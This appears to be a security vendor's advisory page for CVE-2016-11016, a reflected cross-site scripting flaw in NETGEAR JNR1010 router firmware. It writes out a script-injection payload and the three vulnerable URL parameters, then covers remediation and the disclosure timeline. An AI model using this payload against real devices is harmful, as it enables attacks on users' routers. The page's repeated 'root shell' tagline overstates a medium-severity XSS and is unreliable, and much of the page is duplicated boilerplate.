CVE-2016-11016: XSS in NETGEAR JNR1010 Routers

01/Description

What this actually is.

Technical background, root cause, and affected surface.

A multiple cross-site scripting vulnerability was identified on the Netgear router version 1.0.0.24.

Vendor: NetGear
Affected Product: JNR1010_firmware
CVE: CVE-2016-11016
Securin ID: 2016-CSW-01-1014
Status: Fixed
Date: October 25, 2015
Severity: Medium
CVSS Score: 6.1
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

02/Proof of Concept

From one request
to root shell.

Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

ScopeChanged

ImpactC:L / I:L / A:N

SeverityMedium

Inject the malicious JavaScript code ”></scripT><scripT>alert(1)</scripT> in the getpage variable in the URL http://routerip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 and view it on browser which results in the execution of Cross-Site Scripting (XSS).

PoC · Exploitation Steps▲ trigger

01Note: Similarly, var:page & var:menu variable is also injected with malicious JavaScript payload, and it is used as a vehicle for further attack.02Issue 1: The GET request parameter getpage variable in the following URL http://router-ip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 is vulnerable to Cross-Site Scripting (XSS).03Figure 01: XSS Payload injected to the getpage variable, and it echoed back in the given response URL.04Figure 02: XSS Payload gets reflected in the browser.05Issue 2: The GET request parameter var:page variable in the following URL http://router-ip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 is vulnerable to Cross-Site Scripting (XSS).06Figure 03: XSS Payload injected to var:page variable, and it echoed back in the given response URL.07Issue 3: The GET request parameter var:menu variable in the following URL http://router-ip/cgibin/webproc?getpage=html/page.htm&var:page=RST_status&var:menu=advanced&t=1445843230593 is vulnerable to Cross-Site Scripting (XSS).08Figure 04: XSS Payload injected to var:menu variable, and its echoed back in the given response URL.

03/Impact

What an attacker does to you.

Post-exploitation outcomes mapped to CVSS impact metrics.

A cross-site script (XSS) vulnerability allows an attacker to inject malicious code into the Netgear Web UI page.

04/Remediation

Fix it. In this order.

A runbook, not a checklist. Sequence matters — assume compromise before you act.

Download the latest updated firmware and update it as per vendor advisory.

Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2016-11016, contact disclose@securin.io

05/Disclosure Timeline

Vendors moved in days.
Attackers in hours.

Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

Oct 28, 2015

Discovered in Netgear Router Firmware Version 1.0.0.24

Oct 28, 2015

Reported to vendor

Nov 03, 2015

Netgear technical team started addressing the issue after several follow-ups

Dec 13, 2015

Vulnerability got fixed

Dec 30, 2015

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Disclosed 63 days after discovery

06/References

Cite, verify, go deeper.

Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

NVD

NVD — CVE-2016-11016

nvd.nist.gov/vuln/detail/CVE-2016-11016 →

SEC

Securin VI — Full Technical Analysis

vi.securin.io →

01/Description

What this actually is.

Technical background, root cause, and affected surface.

A multiple cross-site scripting vulnerability was identified on the Netgear router version 1.0.0.24.

Vendor: NetGear
Affected Product: JNR1010_firmware
CVE: CVE-2016-11016
Securin ID: 2016-CSW-01-1014
Status: Fixed
Date: October 25, 2015
Severity: Medium
CVSS Score: 6.1
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

02/Proof of Concept

From one request
to root shell.

Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

ScopeChanged

ImpactC:L / I:L / A:N

SeverityMedium

PoC · Exploitation Steps▲ trigger

03/Impact

What an attacker does to you.

Post-exploitation outcomes mapped to CVSS impact metrics.

A cross-site script (XSS) vulnerability allows an attacker to inject malicious code into the Netgear Web UI page.

04/Remediation

Fix it. In this order.

A runbook, not a checklist. Sequence matters — assume compromise before you act.

Download the latest updated firmware and update it as per vendor advisory.

Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2016-11016, contact disclose@securin.io

05/Disclosure Timeline

Vendors moved in days.
Attackers in hours.

Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

Oct 28, 2015

Discovered in Netgear Router Firmware Version 1.0.0.24

Oct 28, 2015

Reported to vendor

Nov 03, 2015

Netgear technical team started addressing the issue after several follow-ups

Dec 13, 2015

Vulnerability got fixed

Dec 30, 2015

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Disclosed 63 days after discovery

06/References

Cite, verify, go deeper.

Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

NVD

NVD — CVE-2016-11016

nvd.nist.gov/vuln/detail/CVE-2016-11016 →

SEC

Securin VI — Full Technical Analysis

vi.securin.io →

Multiple Cross-Site Scripting in Netgear Router

What this actually is.

From one request
to root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.
Attackers in hours.

Discovered in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear technical team started addressing the issue after several follow-ups

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11016

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

Multiple Cross-Site Scripting in Netgear Router

What this actually is.

From one request
to root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.
Attackers in hours.

Discovered in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear technical team started addressing the issue after several follow-ups

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11016

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

Multiple Cross-Site Scripting in Netgear Router

What this actually is.

From one requestto root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.Attackers in hours.

Discovered in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear technical team started addressing the issue after several follow-ups

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11016

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

Multiple Cross-Site Scripting in Netgear Router

What this actually is.

From one requestto root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.Attackers in hours.

Discovered in Netgear Router Firmware Version 1.0.0.24

Reported to vendor

Netgear technical team started addressing the issue after several follow-ups

Vulnerability got fixed

Updated Netgear Router JNR1010 version 1.0.0.32 was released

Cite, verify, go deeper.

NVD — CVE-2016-11016

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

From one request
to root shell.

Vendors moved in days.
Attackers in hours.

From one request
to root shell.

Vendors moved in days.
Attackers in hours.